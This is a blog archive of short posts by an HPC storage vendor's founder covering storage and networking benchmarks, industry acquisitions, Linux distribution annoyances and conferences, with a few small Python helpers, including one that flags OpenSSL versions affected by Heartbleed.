An interesting debate came about on the Beowulf list. Basically, someone asked if they could use Gentoo as a distro for building a cluster, after seeing a post from someone who did something similar. The answer of course is “yes”, with the more detailed answer being that you use what you need to build the cluster and provide the cycles that you or your users will consume. Hey, look, if someone really, truly wants to run their DOS application, Tiburon/Scalable OS will boot it.
Posts
Scratching my head over a weird bonding issue
Trying to set up a channel bond into a 10GbE LAG. Set up bonding module, use the ‘miimon=200 mode=802.3ad’ options. The switch was sending LACP packets, 1/sec to the NICs. The NICs bond formed. But it didn’t seem to negotiate the LACP circuit correctly with the switch. The switch never registered it. I’ve not seen that one before. With Mellanox, Arista, Cisco, others like that, the LACP circuit forms correctly and quickly.
Posts
New customers
We have a number of nice new customers that have been absorbing about all of my time for the last few weeks. This is goodness. One has our current generation FastPath Cadence SSD converged computing and storage system, and will be running kdb+ on it. Another has a 1PB Unison parallel file system, and while we did the previous 2TB write in 73 seconds with it, we did some tuning and tweaking and are down to 68 seconds.
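For reference, those write times translate into sustained bandwidth as follows. This sketch assumes decimal units (1 TB = 10^12 bytes, 1 GB = 10^9 bytes); if the test actually used binary units the numbers shift by a few percent.

```python
TB = 10**12  # assumption: decimal terabytes
GB = 10**9


def throughput_gb_per_s(bytes_written, seconds):
    """Average sustained bandwidth in GB/s."""
    return bytes_written / seconds / GB


if __name__ == "__main__":
    for seconds in (73, 68):
        rate = throughput_gb_per_s(2 * TB, seconds)
        print(f"2 TB in {seconds} s -> {rate:.1f} GB/s")
```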
Posts
M&A: PLX snarfed by ... Avago ?
Ok, didn’t see this acquirer coming, but PLX being bought … yeah, this makes sense. Avago looks like they are trying to become the glue between systems, whether the glue is a data storage fabric, or communications fabric, etc. PLX makes PCIe switches and other kit. PCIe switch and interconnection is the direction that many are converging to. Best end to end latencies, best per-lane performance, no protocol stack silliness to deal with.
Posts
M&A: SanDisk snarfs FusionIO for $1.1B USD
This is only the beginning folks … only the beginning. See this. FusionIO was, quite arguably, in trouble. They needed a buyer to take them to the next level, and to avoid being made completely irrelevant. SanDisk is a natural partner for them. They have the fab and chips, FusionIO has a product. SanDisk has a vision for a flash-only data center. What’s interesting about this is that Fusion was sort of the last independent enterprise class PCI Flash vendor.
Posts
Selling inventory to clear space
[Update 16-June] We’ve sold the 64 bay FastPath Cadence (siFlash based), and now we have a few more 60 bay hybrid Ceph and FhGFS units, as well as a 48 bay front mount siFlash. What’s coming in are many of our next gen 60 bay units, with a new backplane design, and we want to start running benchmarks with them ASAP. As we have limited space in our facility, we gotta make hard choices … Email me (landman@scalableinformatics.
Posts
Divestment: Violin sells off PCIe flash card
This article notes that Violin has divested itself of its PCIe flash card. This card was, to a degree, a shot across the Fusion IO/Virident/Micron bows. I don’t think it ever was a significant threat to them though. Terms of the sale indicate about $23M cash and assumptions of $0.5M liabilities, as well as hiring the team. What is interesting is where it was sold. Hynix. Yes, the memory chip/flash maker.
Posts
M&A: Seagate acquires LSI's flash and accelerated bits from Avago
I’ve been saying for a while that M&A is going to get more intense as companies gird for the battles ahead. I see component vendors looking at doing vertical integration … not necessarily to compete with their customers, but to offer them alternatives, reference designs, etc. and capture a portion of the higher margin businesses. This move gives Seagate control over Sandforce controllers, and PCIe flash. See this link for more info.
Posts
Massive, unapologetic, firepower: 2TB write in 73 seconds
A 1.2PB single mount point Scalable Informatics Unison system, running an MPI job (io-bm) that just dumps data as fast as the little Infiniband FDR network will allow. Our test case. Write 2TB (2x overall system memory) to disk, across 48 procs. No SSDs in the primary storage. This is just spinning rust, in a single rack. This is performance pr0n, though safe for work.
usn-01:/mnt/fhgfs/test # df -H /mnt/fhgfs/
Filesystem Size Used Avail Use% Mounted on
fhgfs_nodev 1.
Posts
Insanity in vendor distros
I am not sure if this is specific to SuSE (customer requirement, don’t ask), but there is some extreme … and I really, positively mean, EXTREME … boneheaded insanity in the dhcp stack in the initrd construction in SuSE. Something that doesn’t lend itself well, to, I dunno … CORRECT AUTOCONFIGURATION OF NETWORK PORTS IN DISKLESS ENVIRONMENTS. Ok, what clued me in was this snippet from the console I’ve been struggling with for the past day.
Posts
io-bm released
At long last, and yes, I can’t believe I let this slip for years … It’s available here at our git site
Posts
Our new look and feel
Day job website has been updated to something … modern. Hopefully nothing is broken … I think it looks great; the Dougs did a terrific job. Seriously, I wound up breaking DNS at the day job (by accident … really) yesterday, in order to try to rationalize something. Had to roll back our DNS servers to an older code drop. That and I had to spin up a new dedicated mail/dns internal server.
Posts
Building efficient storage and computing platforms has little to do with using cheap hardware
This has been bugging me for a long time, and we have to address this in every discussion we have. You can’t build cost effective scale out systems on cheap-ass hardware designs. It’s woefully inefficient; the cost blows up to achieve the type of performance we can achieve often with an order of magnitude fewer systems (hey … that’s less acquisition cost, less TCO, less power/cooling, lower management strain, smaller footprint, tastes great, less filling, …). The only way people recognize this is when they actually try it themselves.
Posts
M&A: Inktank acquired by Red Hat
I am happy for Sage and team, this is a good exit. Obviously we didn’t know this was happening, but I guessed something like this a few weeks ago. Bigger picture: Open source technologies have been capturing mindshare from closed source object, file, and block for a while. This will serve to massively amplify this. GlusterFS was niche until Red Hat bought it. Then it went mainstream. Ceph isn’t GlusterFS though.
Posts
When ideology trumps pragmatic design
Real differentiation, adding real value to something, is often hard to do. Fundamental changes often take time, and are often incremental in scope, so they don’t break everything. That is, unless you are so completely convinced that your way is better, that you try to force the market in that direction. Sometimes these gambits work. Sometimes they don’t. This is about one that did not work. I am convinced my Mac OSX laptop may be the best laptop I’ve used.
Posts
busy last two weeks, and lots of traveling next two weeks
We’ve been cranking out the products to ship to customers, and I’ve been fretting over tests, as usual. And I finished my initial pass at the automated installer. It builds our new Debian based systems very nicely, though there is still a little human interaction. Working on it. And it should work perfectly for all Ubuntu as well. Have an install in Hollywood this week. New market for us, very interesting and it plays completely to our strengths.
Posts
when the networking revolution comes, the cheap switches will be the first ones against the wall
Seriously … no more cheap switches as the central point of information flow in storage or computing clusters. The money you save will be blown in the first hour you pay for down time or architectural changes you need to actually move your data without tossing packets on the ground … … because while standard network codes don’t care so much if they need to retransmit or lose data, cluster file systems get very … very … testy when data doesn’t arrive when and where it is supposed to, in the right order, because the cheap-ass switch was too busy tossing packets on the floor.
Posts
Slides from HPC on Wall Street Spring 2014 are up
See here. Very good conference, lots of good discussion.
Posts
hate to be an alarmist, but Heartbleed is worse than I had thought it was
TL;DR: Run, as in now, before you finish reading this, to update vulnerable OpenSSL packages. Restart your OpenSSL-using services (ssh, https, openvpn). Then nuke your keys, and start all over again. Yeah, it’s that bad. I had hoped, incorrectly, that no one would start asking, “hey, can we exploit this in the wild?” any time soon. Unfortunately … exploits are live and out there. Have a look at this session hijacking done using the bug.
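As a first pass at triage, here is a small sketch that flags upstream OpenSSL version strings in the affected release range (1.0.1 through 1.0.1f; 1.0.1g carries the fix). The function name is mine. Big caveats: distros often backport the fix without changing the version letter, and the 1.0.2 betas are not handled here, so treat the result as a hint and check your vendor's advisory.

```python
import re


def is_heartbleed_version(version):
    """True if an upstream OpenSSL version string falls in 1.0.1 .. 1.0.1f."""
    match = re.fullmatch(r"1\.0\.1([a-z]?)", version.strip())
    if match is None:
        return False
    letter = match.group(1)
    # No letter means the original 1.0.1 release; letters a through f are affected.
    return letter == "" or letter <= "f"


if __name__ == "__main__":
    for version in ("0.9.8y", "1.0.0l", "1.0.1", "1.0.1e", "1.0.1f", "1.0.1g"):
        status = "check this one" if is_heartbleed_version(version) else "not in affected range"
        print(f"{version}: {status}")
```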
Posts
Sometimes things work far better than one might expect
The day job builds a storage product which integrates Ceph as the storage networking layer. What happened was, in idiomatic American English: We made very tasty lemonade out of very bitter lemons. For the rest of the world, this means we had a bad situation during our setup at the booth. 3 boxes of drives and SSDs. 2 of them arrived. The 3rd may have been stolen, or gone missing, or wound up in a shallow grave somewhere.
Posts
Sometimes the right level of caffeination helps in work
I had an opportunity to review an old post I had written about playing with prime numbers. In it, I wrote out an explicit formula for a number, expressed as a product of primes. This goes to the definition of a composite or a prime number. What’s interesting is what leaps out at you when you look at something you wrote a while ago. Looking at the formula I wrote down, there is a very easy way to define if a number is prime or composite.
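One way to read "product of primes" in code is below. This is a sketch using plain trial division, with function names of my own choosing; the prime test shown (the exponents in the factorization sum to exactly 1) is one possible reading of the idea and not necessarily the formulation the original post arrives at.

```python
def factorize(n):
    """Return {prime: exponent} such that n equals the product of prime**exponent."""
    if n < 1:
        raise ValueError("n must be a positive integer")
    factors = {}
    divisor = 2
    while divisor * divisor <= n:
        while n % divisor == 0:
            factors[divisor] = factors.get(divisor, 0) + 1
            n //= divisor
        divisor += 1
    if n > 1:
        # Whatever remains after trial division is itself prime.
        factors[n] = factors.get(n, 0) + 1
    return factors


def is_prime(n):
    """A number is prime exactly when its factorization is a single prime to the first power."""
    return n >= 2 and sum(factorize(n).values()) == 1


if __name__ == "__main__":
    for n in (97, 91, 360):
        print(n, factorize(n), "prime" if is_prime(n) else "composite")
```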
Posts
Doing what we are passionate about
I am lucky. I fully admit this. There are people out there who will tell you that it’s pure skill that they have been in business and been successful for a long time. Others will admit luck is part of it, but will again, pat themselves on the back for their intestinal fortitude. Few will say “I am lucky”. Which is a shame, as luck, timing (which you can never really, truly, control), and any number of other factors really are critical to one being able to have the luxury of doing what we are doing.
Posts
Negative latencies
I’ve been thinking for a while that our obsession with reduction of latency in computing and storage could be ameliorated by exploiting a negative latency design. A negative latency design would be one where a hypothetical message would arrive at a receiver before the sender completed sending it. There are a few issues with this. First off is how on earth, or elsewhere, is this possible? Second, aren’t there issues with causality violations?
Posts
HPC on Wall Street session on low latency cloud
See here for the program sheet. The session is here: HPC on Wall Street Flyer. Description is this:
Wall Street and the global financial markets are building low latency infrastructures for processing and timely response to information content in massive data flows. These big data flows require architectural design patterns at a macro- and micro-level, and have implications for users of cloud systems. This panel will discuss, from macro to micro, how new capabilities and technologies are making a positive impact.
Posts
Intel ditches own Hadoop distro in favor of Cloudera
Last year, Intel started building its own distro of Hadoop. Their argument was that they were optimizing it for their architecture (as compared to, say, ARM). Today came word (via InsideHPC.com) that they are switching to Cloudera. This makes perfect sense to me. Intel couldn’t really optimize Hadoop by compiler options to use new instruction capability (part of their selling point), as Hadoop is a Java thing. And Java has its own VM, and many performance touch points that have nothing to do with processor architecture.
Posts
Nice interview with Freeman Dyson
Freeman Dyson is an incredible scientist. I imagine he, Terence Tao, Paul Erdős and a number of others are all woven from the same cloth. Dyson has done some amazing work, and probably will do some more amazing work. The interview is here. One of the comments he made really struck me as being dead on correct …
I’ve used similar language, describing a Ph.D. as a union card. And I agree it takes far too long in physics.
Posts
Free market forces at work, the way they should be
There’s a much publicized (in SV) trial going on over an oligarchic wage suppression scheme that was in force between a number of big players in SV. Apart from Facebook that is. Techcrunch has the details. What transpires when free market forces are allowed to work with their invisible hands unconstrained? Simple.
Kudos to Facebook for doing the right thing, though in all honesty, I don’t attribute this to being altruistic on their part.
Posts
Staring into voids that stare back
I had mentioned this in my write up about our 10 year anniversary.
And this post yesterday from Scott Weiss at Andreessen Horowitz
It’s in that staring deep and hard into the yawning void that one gets their inspiration. Call it sheer abject terror, or motivation. Whatever. It juices your processors into overdrive if you are an entrepreneur. You are at your most creative when you are at your most fearful.
Posts
Good read on ageism in SV VCs
Oddly enough at the New Republic. Article is here. I was somewhat amused by the read, but some of it rang quite true. It’s nice to hear of more of the signals one needs to read VC tea leaves. They never say no, but they do move goal posts, always outward, always away from you. The article implies they get hung up on TAM, as a proxy for what they really think.
Posts
Unicode and python 64 bit build
[Update] I gave up on 2.7.x. Nothing I did made it work. I removed all the options apart from prefix for compilation of 3.4.0. That worked. Now onto building ipython, ijulia and other good things (SciPy stack). We will use 3.x going forward rather than try to remain compatible with 2.x. Updating our tool chain to include a modern python which will be outside of the distro version. Long … long experience dealing with distro based tools is that they are usually … badly … out of date.
Posts
SIOS Inst
Ok, I am taking the leap. I’ve started working on the SIOS Inst system. Basically, after reviewing everything that’s broken (and for that matter unfixable) in the anaconda, debian-installer, and other installation mechanisms, I’ve decided that for our purposes, the only way that we are going to get correct and reliable builds for stateful systems is to forgo these systems’ advanced installation mechanisms. If we can skip the code entirely, we will.
Posts
HPC on Wall Street
Not only do we have a booth, but we are sponsoring a session on Low Latency Cloud and Big Data. Roosevelt Hotel in NYC on 7-April. See the site for more details. If you’d like to attend and need a pass, please contact me at the day job. Our partners Lucera, Inktank, and Pluribus Networks will be there with us. Possibly more.
Posts
Not so fast ...
Well, after nearly a decade of hooplah over a realization of a quantum computer, an interesting study found that it was
There are a few important elements of this … it uses 1/5th the number of qubits that the newer generation machine used. But it wasn’t, as earlier reported, thousands of times faster.
Way back in the day, when working on benchmarking big machines, and comparing performance, one of the major criteria was using identical (or as near to identical) algorithms as possible to assess machine speed, compiler quality, etc.
Posts
Which (computer) language to learn next?
Ok, I have as one of my professional goals, to learn a new computer language. I am at master level in several, proficient in others, and have working knowledge of a fair number. I’ve forgotten more than I care to admit about some (Fortran, Basic, C/C++, APL, x86 Assembler). The contenders for me should be useful languages. These are not things that should be learned for the sake of learning, but for real useful purposes.
Posts
OT: AirBnB and their issues
Ok, this one is sad. Saw this linked off of hacker news. I am not sure if this is satirical, humorous, or real. It doesn’t quite matter though. We’ve used AirBnB twice now. And we have a firm policy, as a direct result of those very negative experiences, of never … ever … using it again. To be fair, AirBnB is effectively a market maker dealing with the commodity of unused space which could be turned into a profitable asset.
Posts
Playing with several noSQL/document/tuple/time series DBs
We’ve been using MongoDB for a while for a number of things, internally, and thinking about using it for Tiburon as the restful interface. It has some nice aspects about it, but it also has some known issues for larger DBs. Considering what we want to do for some of our work, these larger DB issues are potentially problematic for us. Basically, MongoDB is one of the class of mmap’ed DBs.
Posts
Retired Apache as web server
This has been a long time coming for me. I’ve been using Apache in one form or another since the 90’s. I’ve never found it easy to configure, and often ran into maddening bugs in the config files and how they interacted with the server itself. I’d taken a long time to evaluate the various alternatives. Lighttpd caught my fancy for a while, but I ran into similar problems with config.
Posts
Couldn't have said it better myself ...
Robin at StorageMojo has an interesting article up (right after the one about Violin maybe being dead). I won’t comment on that second one, other than to say I disagree with his analysis and conclusions. As the day job is nominally a competitor (we’ve seen them in a deal, once) I am biased. But the fundamental analysis simply doesn’t look good for them (or Fusion, or …). They need a larger player to buy them.
Posts
The resurrection of autoinst ...
A long time ago, in a galaxy far, far away … I worked for this company named SGI. SGI machines and software were awesome … I had used them (R3k and R8k) for doing calculations for my thesis. Very very fast. But very hard to install/manage. In fact, brutally hard. This was not lost on customers with many of these devices. One of those customers read SGI the riot act on this.
Posts
Good read on the faux-STEM shortages
Good post over at Math Blog. There is no shortage of STEM folks in the US, and hasn’t been for a long … long time. Any shortage of STEM folks would be well represented by a number of economic factors: 1) rapidly rising compensation rates (economic scarcity impacts upon costs of labor), 2) very short job search times for STEM folks, 3) additional market based initiatives to find and retain STEM folks.
Posts
Reality vs what one might like
Many years ago, I had this thought in my head that I wanted to be a physics professor. No, really. I went through all the motions. Undergrad BS, then MS and then PhD. While I was doing this, the Soviet Union collapsed. How was that fact related to my former desire to be a physics prof? Simple. It’s economics. It’s always economics. Anyone tells you differently, they are either lying or selling you something.
Posts
Just created a new external dns on Digital Ocean
About 2 years ago, we had an issue with an internal server blowing up, taking data and config with it. I resolved to place some of our core infrastructure (external DNS, etc.) beyond our virtual boundaries, so we could maintain email/web presence in the event of a power or server issue. This has proven to be a prescient and wise move. We started out on Amazon with their small instances. And started out with dnsmasq, as I didn’t want to re-learn bind and all that config.
Posts
Our second(!) Unison FhGFS based unit
Burning in … Hammering on all disks, while computing pi, e, sqrt(2), … It is a thing of beauty …
[ ](/images/unison.png)
First one was an Isilon replacement. We seem to have many more of these in queue.
Posts
A must-read on HD selection
Henry could probably write far more in depth about this subject than he did. Regardless, this is a must-read article. Now it is important to understand where you can use each technology, and Henry does a great job of explaining some of these. However, it’s important to note that as some of the file system and device bits are pushed into higher levels in the stack, some of the functionality becomes redundant at the lower levels.
Posts
Big blue blues?
I remember my two stints at IBM T.J. Watson very well … first as a summer student (college hire for summer), and then as an engineer after finishing undergraduate. It was a wonderful place. I really enjoyed it. Not simply computer nerd heaven, but physical scientist nerd heaven as well. IBM famously was the company that resisted layoffs and downsizing for a long time. But it eventually gave in, and was forced into RIF actions during their troubled times in the 1990’s and 2000’s.
Posts
In 18 months ...
… I’ll have hit 10 years of blogitude … bloggerisms … er … generation of large amounts of noise and heat, and hopefully at least a little light? Mebbe?
Posts
Excellent article on Lucera's financial cloud
… that the day job is building atop our siCloud platform. In the article (definitely read it!) there is a great discussion about what the fundamental differences are between what Lucera is aiming for and what more traditional commodity cloud vendors are focused upon. When it comes down to it, the difference is architecting for density of VMs in the commodity cloud versus architecting for performance and low latency in the performance cloud (Lucera’s).
Posts
Does fibre channel have a future?
Strange question. It’s really more a question about block storage in general than FC in particular, but I have a sense that FC may be the first to go down as it were. Ok … I’ve been looking up mechanisms to help customers in a media editing environment. Their preferred file system depends, to a degree, upon IP over FC for connectivity. They need to interconnect Mac OSX machines, Linux and Windows machines to the same storage resources.
Posts
The end of an era
Posted to the xfs list:
SGI is stepping out of maintainer roles for xfs, xfsprogs, xfsdump, and xfstests. This removes me from the MAINTAINERS entry.

Signed-off-by: XXXXXXXXXXXXXX
---
[SGI will continue to host oss.sgi.com as a repository for the XFS open source git trees, mailing list, and documentation as is provided today. And will also continue to participate in a less formal role.]

Thanks!
-Ben

MAINTAINERS | 1 -
1 file changed, 1 deletion(-)

SGI, the original creator of xfs almost 20 years ago, is removing itself from the pathway going forward.
Posts
Updates: been busy, but here are a few
We’ve sold our first Unison storage cloud to replace an Isilon unit for a bioinformatics core. Performance and density matter, and we have both. About to deploy next phase of cloud for one of our partners … Setting up an exciting trade show presence … Working on an extension of what we’ve been wanting to build for a long time … and now it looks like it’s in reach. Oh … my … this is huge …
Posts
The state of HPC tier 1 vendors
Much has been happening in the HPC tier 1 vendor space. Some of it has made the news, much has not. The TL;DR version: I believe that most of the tier 1 HPC capability may have been wiped out over the last few months. 1 tier 1 and a bunch of tier 2 are left. Basically, the HPC market has a number of tiers within it, and product mixes across these tiers.
Posts
Lyrical offspring
I can’t name her, at her request, but this is my progeny singing for her high school battle of the bands. They took second place.
Fantastic job, offspring of mine!
Posts
The changing face of storage
Over at InsideHPC, Rich pointed to a blog by Henry Newman about the changing face of SSD. I’d argue that it’s not just SSD, but storage in general. But Henry, as usual, nails it. Henry opines
To a degree, we see them at least investing in the technologies behind the up market devices. At “worst” acquiring them. Because as Henry points out
Very much so. Look at Seagate and WD with their micro NAS appliances.
Posts
On those annoying full page non-scrollable javascript ads on pages
Guys, please, seriously, stop that. They don’t work on mobile or desktop devices when the window size is smaller than the area required to see the [X] Close button. Whoever came up with this, it is a bad idea. Stop it now. Before I get pissed off enough to write a web proxy that specifically filters out such stupidity, or purposefully renders that to an offscreen invisible layer which is forced to be non-modal.
Posts
An offer for the day job's customers in financial services
See here. TL;DR version: A free month on Lucera’s cloud.
Posts
OCP thoughts
I didn’t post a response to the article written a little more than a year ago claiming that OCP had “blown up the server market”. Yes, that was really in the title. I’ll ignore most of the obvious issues with this, but let’s review a year later, shall we? Open hardware designs are great in concept. Share your design with the world, and lower your customers’ costs … er … whoops.
Posts
IBM's sale of x86 servers and networking to Lenovo
I’d waited a while before posting on this for a number of reasons, not the least of which was I was quite busy. But also, I wanted to understand what was and was not sold. Now that some of the dust has settled, and both companies have publicly discussed this, we know pretty well what is included in the sale. I don’t need to get into that aspect, you can read it all very succinctly on Lenovo’s site.
Posts
The last straw for us for gluster
We’ve had customers migrating off of it for the past few years, as bugs have gone un-addressed, reports closed, and discussions cut off or ignored. It’s costing us too much in support time and effort now. It’s time to pull the plug. I like many things about gluster. Really I do. I’ve been a strong proponent of it long before it was cool to do so, as the design was in line with what I thought was needed to build scale out file systems.
Posts
We had a record setting, knock the barn doors down year last year
… and believe it or not, I forgot to mention it. This is the first time in company history that we had a backlog going into Q1. Orders being built and tested on the last work day of the year. We grew, not the amount we had originally forecast, but we understand why (and sadly have little control over that aspect). We are working very hard on our appliances … I am blown away as to how perfect a fit they are for folks.
Posts
Something has been bugging me about the CentOS absorption by Red Hat
I am obviously not a lawyer, and I’ve not consulted one. Feel free to point out my mistakes, and note that this is not legal advice. You need to speak to a lawyer on that, I am just guessing. The language on here is pretty clear as to what Red Hat owns. I have no problem with their ownership of it. Nor do I have a problem with them imposing their particular concept of ownership.
Posts
Yay, latest Java update broke Supermicro remote console
JRE 7 u 51. Self signed Java console applet. Let the hilarity begin. I tried uploading our own cert and key to the unit. No luck. It’s the applet that needs to be re-signed. This is the joyous message that awaits:
Of course, the IPMIview tool sorta kinda works. Though it’s useless for remote support ops. Doesn’t set off the signed issue. Mebbe they ignore signing? Which is worse … the self signed cert, or the sign ignoring app.
Posts
An analytical takedown, gone awry
See here, which is the response to the arXiv article here. While the Facebook data scientists refer to their post as a debunking, using an irrelevant metric (enrollment vs Google rank? and the theory behind this is … what?), the paper points out something quite important. Social networking success has been largely ephemeral, and not sustainable. It’s a transient phenomenon. Anyone remember Friendster? MySpace? More to the point, the internet entities that dominated 15 years ago are largely gone.
Posts
When bugs attack ... the case of the ever expanding VirtualBox image
So I’ve got a Mac Mini and a Linux machine on my desk at work. I am trying hard to use the Mac Mini for day to day stuff, but the sheer broken-ness of the keyboard (yes, really) for Macs is driving me near batty. I am trying though. (Hint to Apple: You aren’t better at everything, and most especially not keyboards and interfacing to higher quality Logitech keyboards, you almost completely fail … don’t even get me started on mice …).
Posts
CentOS™ merges with Red Hat
See this page for more. Inclusive of this merging is a new set of requirements for using the word CentOS. Since we ship an updated and modified kernel, and we update and modify packages to reflect our needs, we are going to have to alter our “CentOS derived distribution” statement. Or switch to another distribution. It’s an annoyance, but maybe it’s time to revisit the distribution scenario. I see nothing wrong with using Debian as the basis, and building from there.
Posts
Blocking hacker probes
I honestly no longer even write a nice note to their ISP. I just tend to block the whole ISP from reaching our site(s). It’s easier, and lower pain for us. Definitely saddens me that we have to do this, but I see enough probes in our logs that I have to.
Posts
Fixed the IPoIB performance issue
For our Unison Parallel File Systems Appliance:
[root@unison-jr4-2 ~]# iperf -c 10.3.1.1
------------------------------------------------------------
Client connecting to 10.3.1.1, TCP port 5001
TCP window size: 1.00 MByte (default)
------------------------------------------------------------
[  3] local 10.3.1.2 port 48383 connected with 10.3.1.1 port 5001
[ ID] Interval       Transfer     Bandwidth
[  3]  0.0-10.0 sec  13.5 GBytes  11.6 Gbits/sec

and of course in parallel

[root@unison-jr4-2 ~]# iperf -c 10.3.1.1 -P2
------------------------------------------------------------
Client connecting to 10.3.1.1, TCP port 5001
TCP window size: 1.
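A quick sanity check on the single-stream run above: the Transfer and Bandwidth columns only agree if the transfer is counted in binary GBytes (2**30 bytes) and the rate in decimal Gbits (10**9 bits). That unit convention is an assumption here, inferred from the numbers lining up rather than stated in the post, and the function name is made up for illustration.

```python
def iperf_gbits_per_sec(gbytes_transferred, seconds):
    """Convert an iperf 'Transfer' figure into the 'Bandwidth' figure.

    Assumes binary GBytes (2**30 bytes) and decimal Gbits (10**9 bits).
    """
    bits = gbytes_transferred * 2**30 * 8
    return bits / seconds / 1e9


rate = iperf_gbits_per_sec(13.5, 10.0)
print(f"{rate:.1f} Gbits/sec")  # 11.6 Gbits/sec
```

With purely decimal units the same transfer would work out to 10.8 Gbits/sec, which does not match the reported line.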
Posts
A network we can work with ...
A Unison file system appliance connected with Infiniband and 10GbE.
[root@unison-jr4-2 ~]# qperf 10.3.1.1 rc_bi_bw
rc_bi_bw:
    bw  =  9.7 GB/sec
[root@unison-jr4-2 ~]# qperf 10.3.1.1 ud_lat ud_bw
ud_lat:
    latency  =  3.66 us
ud_bw:
    send_bw  =  4.9 GB/sec
    recv_bw  =  4.9 GB/sec

and of course, IPoIB

[root@unison-jr4-2 ~]# qperf 10.3.1.1 tcp_bw tcp_lat
tcp_bw:
    bw  =  474 MB/sec
tcp_lat:
    latency  =  13.4 us

which, if you run the same thing over a pair of good 10GbE ports …
Posts
M&A continues ... Xyratex bought by Seagate
The story is in the Register. An immediate question, and one of somewhat deja vu (all over again) … what is the impact upon Lustre IP? Xyratex had announced that it obtained ownership of the Lustre IP from Oracle a few months ago. This IP was in the form of trademarks, and a number of related bits. Now Xyratex has been bought. And if it keeps the Lustre HPC bits, it will be directly competing with its customers.
Posts
The evolving market for HPC: part 1, recent past
I’ve said this many times, and at many different venues. HPC drives downmarket, and does so very hard. High cost solutions have limited lifetimes, at best. At worst, they will not catch on. 2013 was the year of the accelerators. We predicted this many years ago. I won’t beat this dead horse (for us). I’ll simply say “we were right”, and right with great specificity and accuracy. This seems to be a pattern with us.
Posts
Prognostications for 2014 from an expert
Not me. Henry Newman at Enterprise Storage Forum. See article here. His first prediction of more consolidation in the SSD space is a given. I’ve been arguing that for a while. On the fab side, there are what … four producers left? Toshiba/Sandisk, Samsung, Intel/Micron, Hynix? Did I miss anyone? Will any of them leave (voluntarily or otherwise)? I think the SSD space that will really consolidate is on the SSD-as-a-rack-appliance side, as well as on the card side.
Posts
M&A: Avago grabs ... LSI ... ?
Avago, a spinout from Agilent which was a spinout from HP, just bought LSI. Avago is largely a supplier of components to a variety of industries, dealing with modules, optoelectronics, etc. If you look at their product mix, you see effectively zero overlap with LSI. They are not even in, arguably, the same markets. I am scratching my head over this one. I could see it as a play to gain a foothold into the storage space.
Posts
First new Unison product sold
We were showing off the Unison units at #SC13, and while on the show floor, we managed to sell a storage cluster. Well, technically, the sale occurred after the show (last week in reality), but most of the configuration back and forth was during the show. I can’t say anything about the configuration or stack on it … yet … but you’ll be hearing about it fairly soon. It’s one we talk about quite a bit.
Posts
Violin's (and other pure flash array vendors) post IPO struggles continue
There’s a story on The Register right now about Violin Memory losing its CTO. But that’s not the real interesting story. In the article, Chris Mellor does a pretty good job of laying bare the issues around Violin.
There are several different threads running through this. First, they don’t have much real software IP. Their hardware IP is a different story, but fundamentally, we’ve found that it’s best to have a very simple and effective hardware design, coupled with intelligent software.
Posts
The most popular data analytics language
… appears to be R
[ ](http://revolution-computing.typepad.com/.a/6a010534b1db25970b019b00077267970b-popup)
This is in line with what I’ve heard, though I thought SAS was comparable in primary or secondary tool usage. This said, it’s important to note that in this survey, we don’t see mention of Python. Working against this is that it is a small (1300-ish) self-selecting sample, and the reporting company has a stake in the results. Also of importance is that R is a package with an embedded programming language, and Python is a programming language with add-ons.
Posts
And the SC13 video from InsideHPC is up
As usual Rich and the team at InsideHPC have done a tremendous job. If you don’t know InsideHPC and its sibling, InsideBigData, I highly recommend both publications. They are on my go-to list as information sources/summaries. The video shows a well caffeinated Joe, talking through our new products. The problem for us was there simply wasn’t sufficient time to go into detail on everything. Which is a shame IMO, but one we’ll look at rectifying later.
Posts
The 60 second guide to big data by gogrid
The GoGrid folks have put together a nice marketing slide on big data, in the sense that they are explaining the features of it without explaining it, or how/where they fit. It’s implied that they provide all you need for Big Data, but it’s their points along the way that make a great point for the day job and especially our new Fast Path Big Data Appliances. Our argument has always been that you can’t approach Big Data with last millennium’s architecture.
Posts
Big data languages: the reason for the tests
In a number of recent articles, I’ve seen/read that “Python is displacing R”, and other similar things. Something about this intrigued me, as I had heard many years ago that “Python was displacing Perl”. Only, it wasn’t. And others are questioning the supplantation premise quite strongly. It seems that there is little actual evidence of this. Mostly hyperbole, guesses, and dare I say, wishful thinking. It seems that this is modus operandi for Python advocates, and their latest object of attention is R.
Posts
Riemann zeta function in parallel/vector data languages
Continuing the work of the previous post, I looked into rewriting the serial code to run in parallel/vector data languages. My original supposition about what would make a good data language is now in doubt as a result. First, I used PDL in Perl. But it’s Perl, right? It can’t possibly be fast. That would be … like, I dunno … wrong? (yes, this is sarcasm). This completes the task in 12s.
Posts
Knights Landing
Over at InsideHPC, Rich has a short take on Knights Landing with a link to the longer article. This is implicitly the direction I thought things would be going in … drop in replacement CPUs to provide acceleration. Probably some big-small designs to handle OS tasks on specific cores (and reduce OS based jitter). This said, 2x such sockets gets you to 72 lanes of PCIe gen 3. A little light for us, but we’ll figure something out (our current units are more than this).
Posts
... and OCZ goes down
See here. This is a Chapter 7 dissolution, not a Chapter 11 restructuring. Assets to be sold, likely to Toshiba.
I expect more of these from other vendors. SSD space has been needing a consolidation for a while. STEC being purchased by WD, and Smart by Sandisk, has removed most of the high end of the market from the startup side. Pliant was grabbed by Sandisk previously. Who else remains? On the low-midrange of the market, you have Intel, Micron, and a few others.
Posts
I guess no one at the beobash saw the 10% discount link ...
Basically, if you go to this site, provide your information, use the code “beobash13”, you get a nice discount on your next purchase from Scalable Informatics until the end of 2013. The rules are simple. Basically you provide your contact information, let us know what products you want to talk about, buy them and pay for them by the end of the year. We are offering something like a 10% discount for this.
Posts
Finally have a customer information page talking directly to zoho crm
This took a bit, as the API is documented, but wasn’t quite working for some reason. But now we’ve linked our signup page to drop data directly into zoho. This was made harder by the XML based API not working as documented. I posted a forum note, after searching on the forum for answers. Others had the same questions. I built a simple testing code, and it didn’t work. Posted this to the forum.
Posts
SC13: the Limulus boxen appear
[Disclosure: we do have a business relationship with Basement Supercomputing] (this is a longer version of the beowulf item I posted) Years ago, I came to the conclusion that there was no personal supercomputing market after we tried with a deskside system … what I called a “muscular desktop” with a great deal of IO, processing, ram, and graphics. We just could not find the right niche for this, and we were being badly undercut in price by the Dell-like companies of the world, selling low end boxes that were … good enough … for a small set of tasks.
Posts
SC13 observations
From a post to the beowulf list:
I didn’t get a chance to see many booths … I did get free the last hour of Thursday to wander, and made sure I got to see a few people and companies. What I observed (and please feel free to challenge/contradict/offer alternative interpretations/your own views) will definitely be colored by the glasses we wear, and the market we are in.
not so many chip companies (new processor designs, etc.
Posts
SC13 finale
That was a wonderful show. People got to see what we were about, our new appliances, our performance. I see many possibilities. This is good. Some key takeaways:
